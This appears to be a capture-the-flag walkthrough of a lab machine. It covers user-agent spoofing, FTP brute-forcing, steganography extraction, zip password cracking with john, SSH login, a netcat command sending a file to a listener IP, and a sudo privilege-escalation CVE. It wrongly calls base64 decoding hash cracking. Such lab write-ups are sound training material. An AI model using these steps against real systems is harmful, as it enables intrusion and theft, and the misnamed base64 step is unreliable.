Nmap Output:

 

 

When we go to the website, we are told that we need to change the user-agent so that we can access the site. It says "C" on the tip.

 

 

We change the User-Agent value with burp as follows.

 

 

Done.

 

 

This message was sent to Chris. It was said that his password was too weak. Then we can brute-force it.

 

We got the password when we did the brute-force for ftp.

 

 

Let's login to ftp.

 

 

When we log into ftp, 3 files greet us. Let's download all three.

 

 

The note says the pictures are fake.

 

 

binwalk -e cutie.png

 

When we examine it, we see that there is a Zip file in the Cutie.png file.

 

Let's open the zip file.

 

 

We extracted the zip file, but the file inside is encrypted.

 

We can use john to crack the password.

 

 

zip2john 8702.zip > name.zip

 

john name.zip

 

With the commands, we see that the password is 'alien'.

 

Now we can open the file.

 

 

When we open the file, we see a hashed value. Let's crack the hash with base64.

 

 

We found the passphrase for the cute-alien.jpg file.

 

steghide extract -sf cute-alien.jpg

 

 

Inside the file is a password that belongs to James.

 

When we try to login with ftp it says the password is wrong.

 

Then let's login to ssh.

 

 

We found the User Flag.

 

There's also a picture. Let's get the image to our own machine.

 

nc -w 3 10.8.60.115 1234 < Alien_autopsy.jpg

 

nc -lvnp 1234 > image.jpg

 

 

When we search the image with Google reverse image search, we find the answer to the question asked to us.

 

 

Privilege Escalation

 

 

When we search for “(ALL, !root) /bin/bash” we find the CVE value.

 

 

 

Let's exploit.

 

 

The answer to the bonus question is also written under the flag. "DesKel"